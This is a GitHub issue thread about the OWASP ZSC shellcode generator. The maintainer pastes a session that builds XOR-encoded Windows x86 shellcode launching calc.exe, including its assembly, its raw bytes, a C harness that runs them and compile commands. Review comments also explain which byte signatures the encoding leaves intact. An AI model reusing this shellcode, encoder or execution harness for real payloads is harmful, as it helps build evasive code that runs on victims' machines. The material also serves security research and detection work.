Comments (4)
Hi,
can you please share the file or the command you used for generating the shellcode?
Regards.
from zsc.
attached is the generated file
from zsc.
Been waiting for your response, can't this be reproduced into .exe?
from zsc.
Hi, sorry for my late answer. You encoded the file wrong! It has eval(some value) at the end, which is not related to a .c file or to shellcodes.
- here is a sample command
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86 osx_x86 windows_x86 windows_x86_64
zsc/shellcode/generate> w
windows_x86 windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe
[+] file_to_execute set to "test/calc.exe"
[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue
[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> y
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com
Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code:
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x456e6957
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push $0x65909090
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push $0x78652e63
push $0x6c61632f
push $0x74736574
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x636f7250
push $0x74697845
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
compile example(osx_x86): gcc -m32 -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32 -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -o shellcode_compiled.exe shellcode.c
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/
/*
 * Payload bytes for the windows_x86 exec('test/calc.exe') stub described in
 * the header comment of this file (Length: 278, Encode: xor_random).
 *
 * NOTE(review): the "Assembly code" listing in the header is the pre-encoding
 * form (for example a plain `push $0x456e6957`). In the bytes below the same
 * constant is built at run time from two pushed immediates that are XORed
 * together (68 49 31 7a 57 ... 68 1e 58 14 12 ... 31 d9, and
 * 0x577a3149 ^ 0x1214581e == 0x456e6957), so the header listing is not a
 * byte-for-byte disassembly of this string. Analysts should disassemble the
 * bytes themselves rather than trust the comment.
 *
 * NOTE(review): only the pushed string constants are masked. The resolver
 * prologue is emitted in clear: the fs:0x30 read (64 8b 41 30) and the three
 * cmpl immediates 47 65 74 50 / 72 6f 63 41 / 64 64 72 65 ("GetP", "rocA",
 * "ddre") are unchanged, so byte signatures written against that prologue
 * still match this encoded output.
 */
char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
/*
 * Test harness emitted by the generator: jumps into the `shellcode` byte
 * string as if it were a function taking no declared arguments.
 */
int main(void)
{
    /*
     * Reinterpret the address of the byte string as a function pointer.
     * ISO C does not define conversion from an object pointer to a function
     * pointer; this relies on the platform treating both as plain addresses.
     */
    void (*entry)() = (void (*)()) shellcode;

    /*
     * NOTE(review): the bytes live in ordinary data memory. Where DEP/NX is
     * enforced for that memory, this call faults instead of running the
     * stub; that mitigation is what stops this pattern.
     */
    entry();

    /*
     * NOTE(review): per the header listing the stub ends by calling the
     * routine it resolved from the "ExitProcess" name, so this return is
     * presumably not reached when the stub runs to completion.
     */
    return 0;
}
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
Did you use jsfuck encoding or something by accident? jsfuck is a JavaScript obfuscation encoding, so it's not gonna work for the "c" language. (Check the file you attached at line 113.)
from zsc.